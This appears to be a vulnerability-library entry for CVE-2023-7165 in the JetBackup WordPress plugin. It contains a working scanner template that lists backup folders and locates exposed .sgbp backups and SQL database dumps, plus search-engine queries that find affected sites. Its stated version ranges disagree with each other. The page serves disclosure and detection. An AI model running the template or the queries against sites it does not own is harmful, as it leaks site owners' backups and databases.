/Vulnerability Library

JetBackup <= 2.0.9.7 - Sensitive Information Exposure via Directory Listing

CVE-2023-7165
Verified

Description

JetBackup WordPress plugin <= 2.0.9.9 does not use index files to prevent directory listing in certain configurations, letting malicious actors leak backup files, exploit requires access to the web server.

Severity

High

CVSS Score

7.5

Exploit Probability

32%

Affected Product

jetbackup

Published Date

April 9, 2026

Template Author

pussycat0x

CVE-2023-7165.yaml
id: CVE-2023-7165

info:
  name: JetBackup <= 2.0.9.7 - Sensitive Information Exposure via Directory Listing
  author: pussycat0x
  severity: high
  description: |
    JetBackup WordPress plugin <= 2.0.9.9 does not use index files to prevent directory listing in certain configurations, letting malicious actors leak backup files, exploit requires access to the web server.
  impact: |
    Attackers can access and leak sensitive backup files, potentially leading to data exposure and security breaches.
  remediation: |
    Update to version 2.0.9.9 or later that implements index files to prevent directory listing.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup/jetbackup-wp-backup-migrate-restore-2097-sensitive-information-exposure-via-directory-listing
    - https://wpscan.com/vulnerability/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe/
    - https://plugins.trac.wordpress.org/changeset/3016772/backup
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-7165
    cwe-id: CWE-548
    cpe: cpe:2.3:a:developer177:jetbackup:*:*:*:*:*:wordpress:*:*
    epss-score: 0.31581
    epss-percentile: 0.96857
  metadata:
    verified: true
    max-request: 2
    vendor: jetbackup
    product: jetbackup
    framework: wordpress
    publicwww-query: "/wp-content/plugins/backup/"
    fofa-query: body="/wp-content/plugins/backup/"
    google-query: inurl:"/wp-content/uploads/jetbackup/"
    shodan-query: http.html:"/wp-content/plugins/backup/"
  tags: cve,cve2023,wordpress,wp-plugin,jetbackup,wp,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/jetbackup/"

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Index of","jetbackup")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: folder_name
        part: body
        group: 1
        regex:
          - 'href="([^"]*_D\d{14}[^"]*)/"'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/jetbackup/{{folder_name}}/"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, ".sgbp")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        name: database_dump
        part: body
        group: 1
        regex:
          - 'href="([^"]+_database\.sql)"'
        internal: true
# digest: 490a00463044022007b439f85bed4bd0d96c6d92d8d32bd90e9db5b5c8b455473d6fc487608c7be9022025663489e718dde669b78698640ebc320b0d14a6913d1574640427f34af13f6d:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2023-7165
CWE ID:
cwe-548

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup/jetbackup-wp-backup-migrate-restore-2097-sensitive-information-exposure-via-directory-listinghttps://wpscan.com/vulnerability/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe/https://plugins.trac.wordpress.org/changeset/3016772/backup

Remediation Steps

Update to version 2.0.9.9 or later that implements index files to prevent directory listing.